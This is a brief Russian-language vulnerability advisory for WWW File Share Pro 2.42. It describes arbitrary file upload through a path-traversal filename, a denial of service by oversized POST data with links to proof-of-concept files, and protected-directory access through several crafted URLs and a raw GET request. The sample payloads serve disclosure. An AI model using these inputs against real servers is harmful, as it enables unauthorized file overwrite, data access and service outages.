Программа: WWW File Share Pro 2.42
Несколько уязвимостей обнаружено в WWW File Share Pro. Удаленный авторизованный пользователь может перезаписать файлы на целевой системе. Удаленный пользователь может получить доступ к некоторым защищенным каталогам на целевой системе. Удаленный пользователь может аварийно завершить работу системы.
1. Загрузка произвольных файлов [CVE: CAN-2004-0059]:
Content-Disposition: form-data; name="file"; filename="../../../file.txt"
Эксплоит: http://aluigi.altervista.org/poc/wfshare-up.txt
2. Удаленный пользователь может послать POST запрос с чрезмерно большим количеством данных, чтобы заставить систему
использовать 100% CPU и потенциально аварийно завершить работу системы. Пример:
http://aluigi.altervista.org/poc/webpostmem.zi p
http://aluigi.altervista.org/mytoolz/poststrike.zip
3. Доступ к защищенным каталогам [CVE: CAN-2004-0061]:
http://[target]/directory./
http://[ target]/\directory/
http://[target]///directory/
GET \directory/ HTTP/1.0
